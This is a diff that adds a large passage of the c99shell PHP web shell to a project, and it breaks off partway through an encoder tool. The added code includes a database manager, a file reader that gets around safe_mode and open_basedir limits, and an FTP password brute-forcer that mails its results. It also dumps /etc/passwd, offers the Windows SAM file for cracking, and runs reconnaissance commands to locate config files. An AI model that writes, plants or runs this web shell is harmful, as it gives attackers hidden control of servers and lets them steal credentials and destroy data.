+     if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
+     $perpage = $sql_tbl_le - $sql_tbl_ls;
+     if (!is_numeric($perpage)) {$perpage = 10;}
+     $numpages = $count_row[0]/$perpage;
+     $e = explode(" ",$sql_order);
+     if (count($e) == 2)
+     {
+      if ($e[0] == "d") {$asc_desc = "DESC";}
+      else {$asc_desc = "ASC";}
+      $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
+     }
+     else {$v = "";}
+     $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
+     $result = mysql_query($query) or print(mysql_smarterror());
+     echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
+     if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
+     if ($sql_tbl_act == "insert")
+     {
+      if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
+      if (!empty($sql_tbl_insert_radio))
+      {
+
+      }
+      else
+      {
+       echo "<br><br><b>Inserting row into table:</b><br>";
+       if (!empty($sql_tbl_insert_q))
+       {
+        $sql_query = "SELECT * FROM `".$sql_tbl."`";
+        $sql_query .= " WHERE".$sql_tbl_insert_q;
+        $sql_query .= " LIMIT 1;";
+        $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
+        $values = mysql_fetch_assoc($result);
+        mysql_free_result($result);
+       }
+       else {$values = array();}
+       echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
+       foreach ($tbl_struct_fields as $field)
+       {
+        $name = $field["Field"];
+        if (empty($sql_tbl_insert_q)) {$v = "";}
+        echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
+        $i++;
+       }
+       echo "</table><br>";
+       echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
+       if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
+       echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
+      }
+     }
+     if ($sql_tbl_act == "browse")
+     {
+      $sql_tbl_ls = abs($sql_tbl_ls);
+      $sql_tbl_le = abs($sql_tbl_le);
+      echo "<hr size=\"1\" noshade>";
+      echo "[Pages]&nbsp;";
+      $b = 0;
+      for($i=0;$i<$numpages;$i++)
+      {
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
+       echo $i;
+       if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
+       if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
+       else {echo "&nbsp;";}
+      }
+      if ($i == 0) {echo "empty";}
+      echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
+      echo "<tr>";
+      echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
+      for ($i=0;$i<mysql_num_fields($result);$i++)
+      {
+       $v = mysql_field_name($result,$i);
+       if ($e[0] == "a") {$s = "d"; $m = "asc";}
+       else {$s = "a"; $m = "desc";}
+       echo "<td>";
+       if (empty($e[0])) {$e[0] = "a";}
+       if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
+       else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\">[sort]</a>";}
+       echo "</td>";
+      }
+      echo "<td><font color=\"green\"><b>Action</b></font></td>";
+      echo "</tr>";
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       echo "<tr>";
+       $w = "";
+       $i = 0;
+       foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
+       if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
+       echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
+       $i = 0;
+       foreach ($row as $k=>$v)
+       {
+        $v = htmlspecialchars($v);
+        if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
+        echo "<td>".$v."</td>";
+        $i++;
+       }
+       echo "<td>";
+       echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\">[Delete]</a>&nbsp;";
+       echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><b>[Edit]</b></a>&nbsp;";
+       echo "</td>";
+       echo "</tr>";
+      }
+      mysql_free_result($result);
+      echo "</table><hr size=\"1\" noshade><p align=\"left\">^<select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"deleterow\">Delete</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+     }
+    }
+    else
+    {
+     $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
+     if (!$result) {echo mysql_smarterror();}
+     else
+     {
+      echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
+      $i = 0;
+      $tsize = $trows = 0;
+      while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
+      {
+       $tsize += $row["Data_length"];
+       $trows += $row["Rows"];
+       $size = view_size($row["Data_length"]);
+       echo "<tr>";
+       echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
+       echo "<td>".$row["Rows"]."</td>";
+       echo "<td>".$row["Type"]."</td>";
+       echo "<td>".$row["Create_time"]."</td>";
+       echo "<td>".$row["Update_time"]."</td>";
+       echo "<td>".$size."</td>";
+       echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\">[Empty]</a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\">[Drop]</a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><b>[Insert]</b></a>&nbsp;</td>";
+       echo "</tr>";
+       $i++;
+      }
+      echo "<tr bgcolor=\"000000\">";
+      echo "<td><center><b>�</b></center></td>";
+      echo "<td><center><b>".$i." table(s)</b></center></td>";
+      echo "<td><b>".$trows."</b></td>";
+      echo "<td>".$row[1]."</td>";
+      echo "<td>".$row[10]."</td>";
+      echo "<td>".$row[11]."</td>";
+      echo "<td><b>".view_size($tsize)."</b></td>";
+      echo "<td></td>";
+      echo "</tr>";
+      echo "</table><hr size=\"1\" noshade><p align=\"right\">^<select name=\"sql_act\">";
+      echo "<option value=\"\">With selected:</option>";
+      echo "<option value=\"tbldrop\">Drop</option>";
+      echo "<option value=\"tblempty\">Empty</option>";
+      echo "<option value=\"tbldump\">Dump</option>";
+      echo "<option value=\"tblcheck\">Check table</option>";
+      echo "<option value=\"tbloptimize\">Optimize table</option>";
+      echo "<option value=\"tblrepair\">Repair table</option>";
+      echo "<option value=\"tblanalyze\">Analyze table</option>";
+      echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
+      mysql_free_result($result);
+     }
+    }
+   }
+   }
+  }
+  else
+  {
+   $acts = array("","newdb","serverstatus","servervars","processes","getfile");
+   if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
+   if (!empty($sql_act))
+   {
+    echo "<hr size=\"1\" noshade>";
+    if ($sql_act == "newdb")
+    {
+     echo "<b>";
+     if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
+     else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
+    }
+    if ($sql_act == "serverstatus")
+    {
+     $result = mysql_query("SHOW STATUS", $sql_sock);
+     echo "<center><b>Server-status variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table></center>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "servervars")
+    {
+     $result = mysql_query("SHOW VARIABLES", $sql_sock);
+     echo "<center><b>Server variables:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "processes")
+    {
+     if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
+     $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
+     echo "<center><b>Processes:</b><br><br>";
+     echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
+     while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
+     echo "</table>";
+     mysql_free_result($result);
+    }
+    if ($sql_act == "getfile")
+    {
+     $tmpdb = $sql_login."_tmpdb";
+     $select = mysql_select_db($tmpdb);
+     if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
+     if ($select)
+     {
+      $created = FALSE;
+      mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
+      mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
+      $result = mysql_query("SELECT * FROM tmp_file;");
+      if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
+      else
+      {
+       for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
+       $f = "";
+       while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
+       if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
+       else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
+       mysql_free_result($result);
+       mysql_query("DROP TABLE tmp_file;");
+      }
+     }
+     mysql_drop_db($tmpdb); //comment it if you want to leave database
+    }
+   }
+  }
+ }
+ echo "</td></tr></table>";
+ if ($sql_sock)
+ {
+  $affected = @mysql_affected_rows($sql_sock);
+  if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
+  echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
+ }
+ echo "</table>";
+}
+if ($act == "mkdir")
+{
+ if ($mkdir != $d)
+ {
+  if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
+  elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
+  echo "<br><br>";
+ }
+ $act = $dspact = "ls";
+}
+if ($act == "ftpquickbrute")
+{
+ echo "<b>Ftp Quick brute:</b><br>";
+ if (!win) {echo "This functions not work in Windows!<br><br>";}
+ else
+ {
+  function c99ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
+  {
+   if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
+   else {$TRUE = TRUE;}
+   if ($TRUE)
+   {
+    $sock = @ftp_connect($host,$port,$timeout);
+    if (@ftp_login($sock,$login,$pass))
+    {
+     echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
+     ob_flush();
+     return TRUE;
+    }
+   }
+  }
+  if (!empty($submit))
+  {
+   if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
+   $fp = fopen("/etc/passwd","r");
+   if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
+   else
+   {
+    if ($fqb_logging)
+    {
+     if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
+     else {$fqb_logfp = FALSE;}
+     $fqb_log = "FTP Quick Brute (called c99shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
+     if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    }
+    ob_flush();
+    $i = $success = 0;
+    $ftpquick_st = getmicrotime();
+    while(!feof($fp))
+    {
+     $str = explode(":",fgets($fp,2048));
+     if (c99ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
+     {
+      echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
+      $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
+      if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+      $success++;
+      ob_flush();
+     }
+     if ($i > $fqb_lenght) {break;}
+     $i++;
+    }
+    if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
+    $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
+    echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
+    $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
+    if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
+    if ($fqb_logemail) {@mail($fqb_logemail,"c99shell v. ".$shver." report",$fqb_log);}
+    fclose($fqb_logfp);
+   }
+  }
+  else
+  {
+   $logfile = $tmpdir_logs."c99sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
+   $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
+  }
+ }
+}
+if ($act == "d")
+{
+ if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
+ else
+ {
+  echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
+  if (!$win)
+  {
+   echo "<tr><td><b>Owner/Group</b></td><td> ";
+   $ow = posix_getpwuid(fileowner($d));
+   $gr = posix_getgrgid(filegroup($d));
+   $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
+  }
+  echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
+ }
+}
+if ($act == "phpinfo") {@ob_clean(); phpinfo(); c99shexit();}
+if ($act == "security")
+{
+ echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
+ if (!$win)
+ {
+  if ($nixpasswd)
+  {
+   if ($nixpasswd == 1) {$nixpasswd = 0;}
+   echo "<b>*nix /etc/passwd:</b><br>";
+   if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
+   if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
+   echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
+   $i = $nixpwd_s;
+   while ($i < $nixpwd_e)
+   {
+    $uid = posix_getpwuid($i);
+    if ($uid)
+    {
+     $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
+     echo join(":",$uid)."<br>";
+    }
+    $i++;
+   }
+  }
+  else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
+ }
+ else
+ {
+  $v = $_SERVER["WINDIR"]."\repair\sam";
+  if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
+  else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ �.</font></b><br>";}
+ }
+ if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
+ if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
+ if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
+ function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
+ displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
+ displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
+ displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
+ displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
+ displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
+ displaysecinfo("RAM",myshellexec("free -m"));
+ displaysecinfo("HDD space",myshellexec("df -h"));
+ displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
+ displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
+ displaysecinfo("Is cURL installed?",myshellexec("which curl"));
+ displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
+ displaysecinfo("Is links installed?",myshellexec("which links"));
+ displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
+ displaysecinfo("Is GET installed?",myshellexec("which GET"));
+ displaysecinfo("Is perl installed?",myshellexec("which perl"));
+ displaysecinfo("Where is apache",myshellexec("whereis apache"));
+ displaysecinfo("Where is perl?",myshellexec("whereis perl"));
+ displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
+ displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
+ displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
+ displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
+}
+if ($act == "mkfile")
+{
+ if ($mkfile != $d)
+ {
+  if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
+  elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
+  else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
+ }
+ else {$act = $dspact = "ls";}
+}
+if ($act == "encoder")
+{
+ echo "<script>function set_encoder_input(text) {document.forms.encoder.input.value = text;}</script><center><b>Encoder:</b></center><form name=\"encoder\" action=\"".$surl."\" method=POST><input type=hidden name=act value=encoder><b>Input:</b><center><textarea name=\"encoder_input\" id=\"input\" cols=50 rows=5>".@htmlspecialchars($encoder_input)."</textarea><br><br><input type=submit value=\"calculate\"><br><br></center><b>Hashes</b>:<br><center>";
+ foreach(array("md5","crypt","sha1","crc32") as $v)
+ {
+  echo $v." - <input type=text size=50 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$v($encoder_input)."\" readonly><br>";
+ }
+ echo "</center><b>Url:</b><center><br>urlencode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".urlencode($encoder_input)."\" readonly>
+ <br>urldecode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".htmlspecialchars(urldecode($encoder_input))."\" readonly>
+ <br></center><b>Base64:</b><center>base64_encode - <input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".base64_encode($encoder_input)."\" readonly></center>";
+ echo "<center>base64_decode - ";
+ if (base64_encode(base64_decode($encoder_input)) != $encoder_input) {echo "<input type=text size=35 value=\"failed\" disabled readonly>";}
+ else
+ {
+  $debase64 = base64_decode($encoder_input);
+  $debase64 = str_replace("\0","[0]",$debase64);
+  $a = explode("\r\n",$debase64);
+  $rows = count($a);
+  $debase64 = htmlspecialchars($debase64);
+  if ($rows == 1) {echo "<input type=text size=35 onFocus=\"this.select()\" onMouseover=\"this.select()\" onMouseout=\"this.select()\" value=\"".$debase64."\" id=\"debase64\" readonly>";}
